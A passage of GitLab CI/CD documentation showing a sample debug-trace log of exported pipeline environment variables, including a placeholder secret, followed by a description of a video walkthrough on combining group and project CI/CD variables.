++ export CI_BUILD_BEFORE_SHA=0000000000000000000000000000000000000000
++ CI_BUILD_BEFORE_SHA=0000000000000000000000000000000000000000
++ export CI_BUILD_REF_NAME=master
++ CI_BUILD_REF_NAME=master
++ export CI_BUILD_REF_SLUG=master
++ CI_BUILD_REF_SLUG=master
++ export CI_RUNNER_ID=1337
++ CI_RUNNER_ID=1337
++ export CI_RUNNER_DESCRIPTION=shared-runners-manager-4.gitlab.com
++ CI_RUNNER_DESCRIPTION=shared-runners-manager-4.gitlab.com
++ export 'CI_RUNNER_TAGS=gce, east-c, shared, docker, linux, ruby, mysql, postgres, mongo, git-annex'
++ CI_RUNNER_TAGS='gce, east-c, shared, docker, linux, ruby, mysql, postgres, mongo, git-annex'
++ export CI_DEBUG_TRACE=true
++ CI_DEBUG_TRACE=true
++ export GITLAB_USER_ID=42
++ GITLAB_USER_ID=42
++ export GITLAB_USER_EMAIL=user@example.com
++ GITLAB_USER_EMAIL=user@example.com
++ export GITLAB_USER_LOGIN=root
++ GITLAB_USER_LOGIN=root
++ export 'GITLAB_USER_NAME=User'
++ GITLAB_USER_NAME='User'
++ export CI_DISPOSABLE_ENVIRONMENT=true
++ CI_DISPOSABLE_ENVIRONMENT=true
++ export CI_RUNNER_VERSION=12.5.0
++ CI_RUNNER_VERSION=12.5.0
++ export CI_RUNNER_REVISION=577f813d
++ CI_RUNNER_REVISION=577f813d
++ export CI_RUNNER_EXECUTABLE_ARCH=linux/amd64
++ CI_RUNNER_EXECUTABLE_ARCH=linux/amd64
++ export VERY_SECURE_VARIABLE=imaverysecurevariable
++ VERY_SECURE_VARIABLE=imaverysecurevariable
...
Video walkthrough of a working example
The Managing the Complex Configuration Data Management Monster Using GitLab video is a walkthrough of the Complex Config Data Monorepo working example project. It explains how multiple levels of group CI/CD variables can be combined with environment-scoped project variables for complex configuration of application builds or deployments.
The example can be copied to your own group or instance for testing. More details on what other GitLab CI patterns are demonstrated are available at the project page.